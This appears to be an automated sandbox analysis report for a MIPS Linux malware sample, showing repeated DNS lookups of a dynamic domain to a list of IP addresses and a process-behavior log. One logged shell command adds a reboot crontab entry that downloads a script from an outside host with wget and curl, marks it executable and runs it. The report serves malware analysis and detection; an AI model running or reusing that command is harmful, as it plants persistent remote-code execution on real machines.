                                              Oct 26, 2024 19:02:38.062007904 CEST51.158.108.203192.168.2.230x38deNo error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:38.062007904 CEST51.158.108.203192.168.2.230x38deNo error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:38.062007904 CEST51.158.108.203192.168.2.230x38deNo error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:38.062007904 CEST51.158.108.203192.168.2.230x38deNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:38.062007904 CEST51.158.108.203192.168.2.230x38deNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:38.062007904 CEST51.158.108.203192.168.2.230x38deNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:38.062007904 CEST51.158.108.203192.168.2.230x38deNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:38.062007904 CEST51.158.108.203192.168.2.230x38deNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:38.062007904 CEST51.158.108.203192.168.2.230x38deNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:44.449693918 CEST80.152.203.134192.168.2.230xa187No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:44.449693918 CEST80.152.203.134192.168.2.230xa187No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:44.449693918 CEST80.152.203.134192.168.2.230xa187No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:44.449693918 CEST80.152.203.134192.168.2.230xa187No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:44.449693918 CEST80.152.203.134192.168.2.230xa187No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:44.449693918 CEST80.152.203.134192.168.2.230xa187No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:44.449693918 CEST80.152.203.134192.168.2.230xa187No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:44.449693918 CEST80.152.203.134192.168.2.230xa187No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:44.449693918 CEST80.152.203.134192.168.2.230xa187No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:44.449693918 CEST80.152.203.134192.168.2.230xa187No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:44.449693918 CEST80.152.203.134192.168.2.230xa187No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:44.460385084 CEST80.152.203.134192.168.2.230xa187No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:44.460385084 CEST80.152.203.134192.168.2.230xa187No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:44.460385084 CEST80.152.203.134192.168.2.230xa187No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:44.460385084 CEST80.152.203.134192.168.2.230xa187No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:44.460385084 CEST80.152.203.134192.168.2.230xa187No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:44.460385084 CEST80.152.203.134192.168.2.230xa187No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:44.460385084 CEST80.152.203.134192.168.2.230xa187No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:44.460385084 CEST80.152.203.134192.168.2.230xa187No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:44.460385084 CEST80.152.203.134192.168.2.230xa187No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:44.460385084 CEST80.152.203.134192.168.2.230xa187No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:44.460385084 CEST80.152.203.134192.168.2.230xa187No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:55.385015965 CEST81.169.136.222192.168.2.230xd616No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:55.385015965 CEST81.169.136.222192.168.2.230xd616No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:55.385015965 CEST81.169.136.222192.168.2.230xd616No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:55.385015965 CEST81.169.136.222192.168.2.230xd616No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:55.385015965 CEST81.169.136.222192.168.2.230xd616No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:55.385015965 CEST81.169.136.222192.168.2.230xd616No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:55.385015965 CEST81.169.136.222192.168.2.230xd616No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:55.385015965 CEST81.169.136.222192.168.2.230xd616No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:55.385015965 CEST81.169.136.222192.168.2.230xd616No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:55.385015965 CEST81.169.136.222192.168.2.230xd616No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:55.385015965 CEST81.169.136.222192.168.2.230xd616No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:57.432312012 CEST81.169.136.222192.168.2.230xd616No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:57.432312012 CEST81.169.136.222192.168.2.230xd616No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:57.432312012 CEST81.169.136.222192.168.2.230xd616No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:57.432312012 CEST81.169.136.222192.168.2.230xd616No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:57.432312012 CEST81.169.136.222192.168.2.230xd616No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:57.432312012 CEST81.169.136.222192.168.2.230xd616No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:57.432312012 CEST81.169.136.222192.168.2.230xd616No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:57.432312012 CEST81.169.136.222192.168.2.230xd616No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:57.432312012 CEST81.169.136.222192.168.2.230xd616No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:57.432312012 CEST81.169.136.222192.168.2.230xd616No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:02:57.432312012 CEST81.169.136.222192.168.2.230xd616No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:03:01.375931978 CEST217.160.70.42192.168.2.230x731cNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:03:01.375931978 CEST217.160.70.42192.168.2.230x731cNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:03:01.375931978 CEST217.160.70.42192.168.2.230x731cNo error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:03:01.375931978 CEST217.160.70.42192.168.2.230x731cNo error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:03:01.375931978 CEST217.160.70.42192.168.2.230x731cNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:03:01.375931978 CEST217.160.70.42192.168.2.230x731cNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:03:01.375931978 CEST217.160.70.42192.168.2.230x731cNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:03:01.375931978 CEST217.160.70.42192.168.2.230x731cNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:03:01.375931978 CEST217.160.70.42192.168.2.230x731cNo error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:03:01.375931978 CEST217.160.70.42192.168.2.230x731cNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:03:01.375931978 CEST217.160.70.42192.168.2.230x731cNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:03:22.337086916 CEST217.160.70.42192.168.2.230x98e4No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:03:22.337086916 CEST217.160.70.42192.168.2.230x98e4No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:03:22.337086916 CEST217.160.70.42192.168.2.230x98e4No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:03:22.337086916 CEST217.160.70.42192.168.2.230x98e4No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:03:22.337086916 CEST217.160.70.42192.168.2.230x98e4No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:03:22.337086916 CEST217.160.70.42192.168.2.230x98e4No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:03:22.337086916 CEST217.160.70.42192.168.2.230x98e4No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:03:22.337086916 CEST217.160.70.42192.168.2.230x98e4No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:03:22.337086916 CEST217.160.70.42192.168.2.230x98e4No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:03:22.337086916 CEST217.160.70.42192.168.2.230x98e4No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                              Oct 26, 2024 19:03:22.337086916 CEST217.160.70.42192.168.2.230x98e4No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false

                                              System Behavior

                                              Start time (UTC):17:02:16
                                              Start date (UTC):26/10/2024
                                              Path:/tmp/mips.elf
                                              Arguments:/tmp/mips.elf
                                              File size:5777432 bytes
                                              MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                              Start time (UTC):17:02:16
                                              Start date (UTC):26/10/2024
                                              Path:/tmp/mips.elf
                                              Arguments:-
                                              File size:5777432 bytes
                                              MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                              Start time (UTC):17:02:16
                                              Start date (UTC):26/10/2024
                                              Path:/bin/sh
                                              Arguments:sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):17:02:16
                                              Start date (UTC):26/10/2024
                                              Path:/bin/sh
                                              Arguments:-
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):17:02:16
                                              Start date (UTC):26/10/2024
                                              Path:/bin/sh
                                              Arguments:-
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):17:02:16
                                              Start date (UTC):26/10/2024
                                              Path:/usr/bin/crontab
                                              Arguments:crontab -l
                                              File size:43720 bytes
                                              MD5 hash:66e521d421ac9b407699061bf21806f5

                                              Start time (UTC):17:02:16
                                              Start date (UTC):26/10/2024
                                              Path:/bin/sh
                                              Arguments:-
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):17:02:16
                                              Start date (UTC):26/10/2024
                                              Path:/usr/bin/crontab
                                              Arguments:crontab -
                                              File size:43720 bytes
                                              MD5 hash:66e521d421ac9b407699061bf21806f5

                                              Start time (UTC):17:02:16
                                              Start date (UTC):26/10/2024
                                              Path:/tmp/mips.elf
                                              Arguments:-
                                              File size:5777432 bytes
                                              MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                              Start time (UTC):17:02:17
                                              Start date (UTC):26/10/2024
                                              Path:/tmp/mips.elf
                                              Arguments:-
                                              File size:5777432 bytes
                                              MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                              Start time (UTC):17:02:17
                                              Start date (UTC):26/10/2024
                                              Path:/tmp/mips.elf
                                              Arguments:-
                                              File size:5777432 bytes
                                              MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                              Start time (UTC):17:02:16
                                              Start date (UTC):26/10/2024
                                              Path:/tmp/mips.elf
                                              Arguments:-
                                              File size:5777432 bytes
                                              MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                              Start time (UTC):17:02:16
                                              Start date (UTC):26/10/2024
                                              Path:/tmp/mips.elf
                                              Arguments:-
                                              File size:5777432 bytes
                                              MD5 hash:0083f1f0e77be34ad27f849842bbb00c